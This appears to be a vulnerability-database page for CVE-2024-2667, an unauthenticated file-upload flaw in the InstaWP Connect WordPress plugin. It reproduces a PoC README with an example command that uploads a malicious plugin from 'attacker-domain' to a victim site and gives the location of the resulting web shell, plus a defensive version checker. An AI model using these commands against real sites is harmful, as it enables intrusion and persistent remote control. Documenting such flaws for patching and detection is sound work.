Related vulnerability
Title:
WordPress plugin InstaWP Connect security vulnerability
(CVE-2024-2667)
Description: WordPress and WordPress plugin are both products of the WordPress Foundation. WordPress is a blogging platform developed in PHP; it lets users host a personal blog on a server running PHP and MySQL. WordPress plugin is an application plugin for that platform. WordPress plugin InstaWP Connect versions 0.1.0.22 and earlier contain a security vulnerability caused by insufficient file validation in the /wp-json/instawp-connect/v1/config REST API endpoint, which allows arbitrary file upload.
Introduction
# CVE-2024-2667-Poc 🚀
## Description
The InstaWP Connect – 1-click WP Staging & Migration plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file validation in the /wp-json/instawp-connect/v1/config REST API endpoint in all versions up to, and including, 0.1.0.22. This makes it possible for unauthenticated attackers to upload arbitrary files.
# Script Usage Guide ⚙️
### Install Requirements
| Description | Details | Icon |
|--------------------------------------------|---------------------------------------------------------------------------------------------|-------|
| Install Required Libraries | Use `pip` to install the necessary Python libraries: `requests` and `beautifulsoup4`. | 🛠️ |
| Command to Install | Run: `pip install requests beautifulsoup4`. | 📥 |
### Run the Script
| Description | Details | Icon |
|--------------------------------------------|---------------------------------------------------------------------------------------------|-------|
| Execute the Script | Run the script using the command line with required arguments. | 🚀 |
| Required Arguments | `-up`: Plugin URL (e.g., `http://attacker-domain/malicious-plugin.zip`); `-u`: Target WordPress URL (e.g., `http://victim-domain/`). | 🔧 |
| Example Command | `python CVE-2024-2667.py -up http://attacker-domain/malicious-plugin.zip -u http://victim-domain/` | 📜 |
### Check Vulnerability
| Description | Details | Icon |
|--------------------------------------------|---------------------------------------------------------------------------------------------|-------|
| Version Check | The script examines the `readme.txt` file for the version of the target plugin. | 🔍 |
| Vulnerable Version | If the version is `<= 0.1.0.22`, the script prints: `The site is vulnerable.` | ⚠️ |
| Safe Version | If the version is `> 0.1.0.22`, the script prints: `The site is not vulnerable.` | ✅ |
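The version check described in the table above, as an added example that is not part of the PoC repository: it reads the `Stable tag:` line of a WordPress plugin `readme.txt` (supplied here as constructed strings rather than fetched from a site), compares it numerically against 0.1.0.22, and reports "unknown" for non-numeric tags such as `trunk` instead of guessing.

```python
import re
from typing import Optional, Tuple

# Last affected release according to the advisory quoted on this page.
LAST_VULNERABLE = "0.1.0.22"


def parse_version(text: str) -> Optional[Tuple[int, ...]]:
    """Turn a dotted version such as '0.1.0.22' into a tuple of ints.
    Returns None for non-numeric tags such as 'trunk'."""
    parts = text.strip().split(".")
    if not parts or not all(p.isdigit() for p in parts):
        return None
    return tuple(int(p) for p in parts)


def stable_tag(readme: str) -> Optional[str]:
    """Extract the 'Stable tag:' value from a plugin readme.txt body."""
    m = re.search(r"^\s*Stable tag:\s*(\S+)", readme, re.IGNORECASE | re.MULTILINE)
    return m.group(1) if m else None


def is_vulnerable_version(readme: str) -> Optional[bool]:
    """True if readme.txt reports a version <= 0.1.0.22, False if newer,
    None if no numeric version can be read (treat as 'verify manually')."""
    tag = stable_tag(readme)
    if tag is None:
        return None
    found = parse_version(tag)
    limit = parse_version(LAST_VULNERABLE)
    if found is None or limit is None:
        return None
    # Pad to equal length so 0.1.1 compares as 0.1.1.0 against 0.1.0.22.
    width = max(len(found), len(limit))
    found += (0,) * (width - len(found))
    limit += (0,) * (width - len(limit))
    return found <= limit


# Constructed sample readme bodies (not taken from any real site).
SAMPLE_OLD = "=== InstaWP Connect ===\nRequires at least: 5.0\nStable tag: 0.1.0.22\n"
SAMPLE_NEW = "=== InstaWP Connect ===\nStable tag: 0.1.0.23\n"
SAMPLE_TRUNK = "=== InstaWP Connect ===\nStable tag: trunk\n"

if __name__ == "__main__":
    for label, body in (("old", SAMPLE_OLD), ("new", SAMPLE_NEW), ("trunk", SAMPLE_TRUNK)):
        print(label, is_vulnerable_version(body))
```

Use it against a copy of your own site's `readme.txt`; a `None` result means the tag is not a plain version number and the installed version should be confirmed from the WordPress admin plugin list instead.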
### Shell Location
| Description | Details | Icon |
|--------------------------------------------|---------------------------------------------------------------------------------------------|-------|
| Shell Path | If the upload is successful, the shell will be accessible at `wp-content/plugins/instawp-connect/shell.php`. | 🐚 |
### Usage (`--help` output)
```
usage: CVE-2024-2667.py [-h] -up URL_PLUGIN -u URL_TARGET
The InstaWP Connect – 1-click WP Staging & Migration plugin for WordPress is vulnerable to arbitrary file uploads due
to insufficient file validation in the /wp-json/instawp-connect/v1/config REST API endpoint in all versions up to, and
including, 0.1.0.22. This makes it possible for unauthenticated attackers to upload arbitrary files.
options:
-h, --help show this help message and exit
-up URL_PLUGIN, --url_plugin URL_PLUGIN
URL of the plugin (e.g., http://attacker-domain/malicious-plugin.zip).
-u URL_TARGET, --url_target URL_TARGET
URL of the target WordPress site (e.g., http://victim-domain/).
```
File snapshot
[4.0K] /data/pocs/1c0bda3e837011da963e42896142f7aff1a8461f
├── [3.1K] CVE-2024-2667.py
└── [4.0K] README.md
0 directories, 2 files
Notes
1. It is recommended to access the PoC through its original source first.
2. If the source is no longer available or cannot be reached, send an e-mail to f.jinxu#gmail.com to request a local snapshot (replace # with @).
3. Shenlong has taken a snapshot of the PoC code for you; to support long-term maintenance, please consider paying for the local PoC. Thank you for your support.